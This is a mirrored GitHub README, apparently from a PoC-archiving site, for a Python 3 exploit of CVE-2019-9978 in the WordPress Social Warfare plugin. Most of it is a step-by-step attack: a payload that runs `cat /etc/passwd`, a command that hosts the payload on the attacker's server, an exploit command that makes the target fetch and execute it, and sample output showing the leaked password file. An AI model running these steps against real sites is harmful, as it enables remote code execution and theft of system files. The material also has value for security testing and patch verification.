Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-9978 PoC — WordPress social-warfare插件跨站脚本漏洞

Source
https://github.com/echoosso/CVE-2019-9978
Associated Vulnerability
Title:WordPress social-warfare插件跨站脚本漏洞 (CVE-2019-9978)
Description:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件。 WordPress social-warfare插件3.5.3之前版本中存在跨站脚本漏洞。远程攻击者可借助‘swp_url’参数利用该漏洞注入恶意的JavaScript脚本。
Description
A Remote Code Execution (RCE) vulnerability in the Social Warfare plugin for WordPress, affecting versions below 3.5.3.
Readme
# CVE-2019-9978 - Social Warfare WordPress Plugin RCE < 3.5.3

A Remote Code Execution (RCE) vulnerability in the **Social Warfare** plugin for WordPress, affecting all versions below **3.5.3**.

---

## 💡 Motivation

The original public exploit was written in an outdated version of Python and no longer runs properly in modern environments.  
I rewrote the exploit to be fully compatible with **Python 3**, making it easier to use, understand, and integrate into modern tooling.

---

## Proof of Concept (PoC)

### ✅ Step 1 – Create the Payload

Create a file named `payload.txt` with the following content:

```html
<pre>system('cat /etc/passwd')</pre>
```

---

### ✅ Step 2 – Start a Python HTTP Server

Use Python to serve your payload:

```bash
python3 -m http.server 8000
```

This will make your `payload.txt` accessible at:

```
http://<your-ip>:8000/payload.txt
```

---

### ✅ Step 3 – Run the Exploit

```bash
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt
```

---

### Expected Output

If the target is vulnerable, you will receive output similar to:

```
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```

---

## Screenshots


### HTTP Server Receives Request

![http-server](https://github.com/user-attachments/assets/29c63c20-48dc-49f9-ae5d-9fc3aedcde8f)


### Successful Exploit Execution

![exploit](https://github.com/user-attachments/assets/209fb5a8-4737-4bf9-8700-fc169e1a7833)




### Payload File Content

![payload](https://github.com/user-attachments/assets/24293c44-b3b9-4891-a2d9-25bb8612ac5b)



---

##  Technical Details

- **Plugin:** Social Warfare
- **Affected Versions:** `< 3.5.3`
- **CVE:** [CVE-2019-9978](https://www.exploit-db.com/exploits/46794)
- **Vulnerability Type:** Remote Code Execution (RCE)
- **Original Author:** [@hash3liZer](https://github.com/hash3liZer/CVE-2019-9978)
- **Researcher:** Luka Sikic

---

##  Credits

- **Exploit Author:** [@hash3liZer](https://github.com/hash3liZer)  
- **Python 3 Rework:** [@echosso](https://www.linkedin.com/in/oussama-larhnimi-8a1a01b8/) 



---

> ⚠️ **Disclaimer**: This repository is for educational and ethical testing purposes only.  
> Unauthorized use of this exploit against systems you do not own is strictly prohibited.
File Snapshot

 [4.0K]  /data/pocs/a4a776f2b4c8bfed09a49f95c6f3cb19237a9666
├── [2.0K]  CVE-2019-9978.py
├── [ 11K]  LICENSE
├── [  37]  payload.txt
└── [2.4K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.